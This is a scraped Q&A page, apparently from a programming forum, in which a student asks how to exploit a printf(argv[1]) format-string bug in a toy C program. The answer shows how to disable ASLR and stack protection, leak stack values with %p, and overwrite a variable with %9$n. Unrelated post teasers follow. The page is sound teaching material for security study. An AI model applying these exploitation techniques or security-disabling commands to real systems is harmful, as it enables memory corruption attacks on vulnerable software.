c - How to use Format String Attack -

-

assume have following code:

#include <stdio.h> #include <stdlib.h> #include <fcntl.h>  int num1 = 0;  int main(int argc, char **argv){     double num2;     int *ptr = &num1;     printf(argv[1]);      if (num1== 2527){         printf("well done");     }     if(num2 == 4.56)         printf("you format string expert");     return 0; }

i trying understand how right can't organize mind guides on internet.

is suppose like:

./program %p %p %p %p

and then

 ./program $( printf "\xaa\xaa\xaa\xaa") %.2523d%n

i can't figure out, please me through it.

the main point of exploit string running program through prinft function. need both "well done" , "you format string expert" printed. in case, through linux terminal/shell. hustmphrrr notice: indeed supposed white hacking - software security

first of recommend read book hacking: art of exploitation. good.

now try explain how can exploit program. assume know basics format string exploits, don't have start beginning. important disable aslr , compile executable without stack protection.

# disable aslr @> echo 0 | sudo tee /proc/sys/kernel/randomize_va_space # compile without stack protection @> gcc -g -fno-stack-protector -z execstack fmt.c

i modified program little bit, easier understand how exploit works:

#include <stdio.h>  int num1 = 0xdead;  int main(int argc, char **argv){     int num2 = 0xbeef;     int *ptr = &num1;     printf(argv[1]);      if (num1 == 0xabc){         printf("well done");     }     if(num2 == 0xdef)         printf("you format string expert");      printf("\n[debug] num1: 0x%x [%p] num2: 0x%x [%p]\n", num1, &num1, num2, &num2);     return 0; }

i using 64-bit ubunty system. pointer size 8 bytes.

the exploit

variable num1

first try change variable num1. address of num1 stored in ptr. ptr local variable in main, put on stack (type int*). examine stack can use %p format specifier.

@> ./a.out %p.%p.%p.%p.%p.%p.%p.%p.%p

output:

0x7fffffffdf78.0x7fffffffdf90.(nil).0x7ffff7dd4e80.0x7ffff7dea560.0x7fffffffdf78.0x200400440.0xbeefffffdf70.0x601040 [debug] num1: 0xdead [0x601040] num2: 0xbeef [0x7fffffffde84]

we can see 9th element has value 0x601040. same value in our debug message num1: 0xdead [0x601040]. know 0x601040 pointer variable num1 , located on stack. change value (write in memory) can use %n format specifier in combination direct parameter access %9$n write address stored in 9th stack position.

to gain access well done message need write 0xabc values stdout , use %n write number in memory:

@> ./a.out `python -c "print('a' * 0xabc)"`%9\$n

i use python generate output. program prints "well done".

variable num2

if take close output see 8th element has value beef. our variable num2. still did not figure out, how exploit num2 try explain how in theory. want put arbitrary memory address on stack. address should address points num2 (0x7fffffffde84). after can use %n parameter write address. put address on stack can use format string.

@> ./a.out `printf "\x08\x07\x06\x05\x04\x03\x02\x01"`

the problem have find location of format string on stack.

@> ./a.out aaaa`printf "\x08\x07\x06\x05\x04\x03\x02\x01"`bbbb`python -c "print('%p.' * 200)"`

the 'a's , 'b's padding , easier find our address in output. exploit looks similar num1 exploit way:

@> ./a.out address`python -c "print('a' * val_to_write)"`padding%location_of_address\$n

the problem: in our scenario address of num2 0x7fffffffde84 (that 0x00007fffffffde84). address can not written because 0x00 c-string terminator. can not put address in our format string.


Comments

Post a Comment

Popular posts from this blog

java - Oracle EBS .ClassNotFoundException: oracle.apps.fnd.formsClient.FormsLauncher.class ERROR -

-
i need in configuring java on machine because, when try loading forms, loader goes in circles , gives error: java.lang.classnotfoundexception: oracle.apps.fnd.formsclient.formslauncher.class @ sun.plugin2.applet.applet2classloader.findclass(unknown source) @ sun.plugin2.applet.plugin2classloader.loadclass0(unknown source) @ sun.plugin2.applet.plugin2classloader.loadclass(unknown source) @ sun.plugin2.applet.plugin2classloader.loadclass(unknown source) @ java.lang.classloader.loadclass(unknown source) @ sun.plugin2.applet.plugin2classloader.loadcode(unknown source) @ sun.plugin2.applet.plugin2manager.createapplet(unknown source) @ sun.plugin2.applet.plugin2manager$appletexecutionrunnable.run (unknown source) @ java.lang.thread.run(unknown source) i have tried re-installing firefox, older versions of java runtime environments, disabling proxy. what missing? application working on other machines. i spent around 100 hours finding s...
Read more

c# - how to use buttonedit in devexpress gridcontrol -

-
Image
i trying create gridcontrol buttonedit in 1 of columns. when user clicks button edit, popups form select product. when selection done on popup, returns datarow selection main grid below. but when column loses focus, value wrote column disappear. here code creates gridcontrol's data , buttonedit's click event. private void frmsiparisnew_load(object sender, eventargs e) { dt = new datatable(); dt.columns.add("malzeme_kodu",typeof(string)); dt.columns.add("malzeme_aciklama", typeof(string)); dt.columns.add("adet", typeof(decimal)); dt.columns.add("birim", typeof(string)); dt.columns.add("fiyat", typeof(decimal)); dt.columns.add("kur", typeof(string)); dt.columns.add("tutar", typeof(decimal)); datarow dr = dt.newrow(); dt.rows.add(dr); gc.datasource = dt; } private void repositoryitembuttoneditmal...
Read more

How do you convert a timestamp into a datetime in python with the correct timezone? -

-
you naively expect work: import pytz datetime import datetime def tz_datetime_from_timestamp(timestamp): """convert timestamp datetime """ tz = pytz.timezone('australia/perth') server_time = datetime.utcnow() delta = tz.utcoffset(server_time) value = datetime.utcfromtimestamp(timestamp).replace(tzinfo=tz) return value + delta print tz_datetime_from_timestamp(1416387060) and convert timestamp 1416387060 wed nov 19 16:51:00 2014 gmt+8:00. ...but not. prints: 2014-11-19 16:51:00+07:43 the timezone of australia/perth not gmt+7:43. it gmt+8:00. unequivocally stated on australian government website http://www.australia.gov.au/about-australia/our-country/time : awst equal coordinated universal time plus 8 hours (utc +8). so, heck pytz pulling 7.43 from? well, turns out pytz pulls data http://www.iana.org/time-zones time zone database, , database states: # western australia # # rule name type in on @...
Read more